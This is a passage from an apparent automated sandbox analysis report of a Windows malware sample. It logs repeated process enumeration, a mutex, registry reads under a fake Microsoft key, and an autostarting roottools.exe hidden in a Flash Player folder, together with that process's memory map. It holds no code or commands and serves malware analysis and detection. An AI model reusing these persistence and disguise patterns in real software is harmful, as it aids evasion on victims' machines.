Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION False 1
Fn
System Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION False 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
Process Open desired_access = PROCESS_QUERY_INFORMATION True 1
Fn
For performance reasons, the remaining 66 entries are omitted.
The remaining entries can be found in glog.xml.
Thread 0xa8c
(Host: 1, Network: 0)
+
Category Operation Information Success Count Logfile
Mutex Create mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 True 1
Fn
Thread 0x960
(Host: 3, Network: 0)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Sleep duration = -1 (infinite) False 1
Fn
Thread 0x964
(Host: 3, Network: 0)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY True 2
Fn
Data
System Sleep duration = -1 (infinite) False 1
Fn
Thread 0x968
(Host: 4, Network: 0)
+
Category Operation Information Success Count Logfile
Registry Open Key reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 0 True 1
Fn
Process #15: roottools.exe
(Host: 670, Network: 0)
+
Information Value
ID #15
File Name c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe
Command Line "C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe"
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:04:52, Reason: Autostart
Unmonitor End Time: 00:10:13, Reason: Terminated by Timeout
Monitor Duration 00:05:21
OS Process Information
+
Information Value
PID 0x6a4
Parent PID 0x570 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:0000f83e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 6A8
0x 324
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False
private_0x0000000000210000 0x00210000 0x0028ffff Private Memory Readable, Writable True False False
private_0x0000000000290000 0x00290000 0x002fffff Private Memory Readable, Writable True False False
private_0x0000000000290000 0x00290000 0x0029ffff Private Memory Readable, Writable True False False
pagefile_0x00000000002a0000 0x002a0000 0x002a6fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002b0000 0x002b0000 0x002b1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000002c0000 0x002c0000 0x002c7fff Private Memory Readable, Writable True False False
pagefile_0x00000000002d0000 0x002d0000 0x002d0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000002f0000 0x002f0000 0x002fffff Private Memory Readable, Writable True False False
private_0x0000000000300000 0x00300000 0x003fffff Private Memory Readable, Writable True False False
roottools.exe 0x00400000 0x00432fff Memory Mapped File Readable, Writable, Executable True False False
private_0x0000000000400000 0x00400000 0x0041bfff Private Memory Readable, Writable, Executable True False False
private_0x0000000000440000 0x00440000 0x004effff Private Memory Readable, Writable True False False
private_0x0000000000440000 0x00440000 0x0047ffff Private Memory Readable, Writable True False False
private_0x00000000004b0000 0x004b0000 0x004effff Private Memory Readable, Writable True False False
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000520000 0x00520000 0x006a7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000840000 0x00840000 0x01c3ffff Pagefile Backed Memory Readable True False False
private_0x0000000001c40000 0x01c40000 0x01d3ffff Private Memory Readable, Writable True False False
private_0x0000000001c40000 0x01c40000 0x01d1ffff Private Memory Readable, Writable True False False
private_0x0000000001c40000 0x01c40000 0x01cbffff Private Memory Readable, Writable True False False
private_0x0000000001ce0000 0x01ce0000 0x01d1ffff Private Memory Readable, Writable True False False
private_0x0000000001d30000 0x01d30000 0x01d3ffff Private Memory Readable, Writable True False False
private_0x0000000001d40000 0x01d40000 0x0213ffff Private Memory Readable, Writable True False False
sortdefault.nls 0x02140000 0x0240efff Memory Mapped File Readable False False False
private_0x0000000002410000 0x02410000 0x0263ffff Private Memory Readable, Writable True False False
pagefile_0x0000000002410000 0x02410000 0x024eefff Pagefile Backed Memory Readable True False False
private_0x00000000024f0000 0x024f0000 0x025effff Private Memory Readable, Writable True False False
private_0x0000000002600000 0x02600000 0x0263ffff Private Memory Readable, Writable True False False
pagefile_0x0000000002640000 0x02640000 0x02a32fff Pagefile Backed Memory Readable True False False
staticcache.dat 0x02a40000 0x0336ffff Memory Mapped File Readable False False False
private_0x0000000003370000 0x03370000 0x0349ffff Private Memory Readable, Writable True False False
rsaenh.dll 0x03370000 0x033abfff Memory Mapped File Readable False False False
private_0x0000000003460000 0x03460000 0x0349ffff Private Memory Readable, Writable True False False
private_0x00000000034a0000 0x034a0000 0x0b49ffff Private Memory Readable, Writable, Executable True False False
private_0x000000000b4a0000 0x0b4a0000 0x0b5effff Private Memory Readable, Writable True False False
msvbvm60.dll 0x72940000 0x72a92fff Memory Mapped File Readable, Writable, Executable True False False
sxs.dll 0x74010000 0x7406efff Memory Mapped File Readable, Writable, Executable False False False
dwmapi.dll 0x74130000 0x74142fff Memory Mapped File Readable, Writable, Executable False False False
uxtheme.dll 0x741b0000 0x7422ffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x743d0000 0x743d7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x743e0000 0x7443bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74440000 0x7447efff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x75630000 0x7566afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x75670000 0x75685fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x75690000 0x75697fff Memory Mapped File Readable, Writable, Executable False False False
dhcpcsvc.dll 0x756a0000 0x756b1fff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x756c0000 0x756c6fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x756d0000 0x756ebfff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75800000 0x7580bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75810000 0x7586ffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x758c0000 0x759bffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759c0000 0x75acffff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x75ad0000 0x75ad4fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75ae0000 0x75c3bfff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x75c40000 0x75e3afff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75f20000 0x76014fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x760b0000 0x7610ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76110000 0x761acfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x761b0000 0x7623efff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x76240000 0x7635cfff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x76360000 0x7636bfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76370000 0x763c6fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76570000 0x7663bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76640000 0x76685fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76690000 0x767c5fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x767d0000 0x767e8fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x767f0000 0x767f5fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76800000 0x768effff Memory Mapped File Readable, Writable, Executable False False False
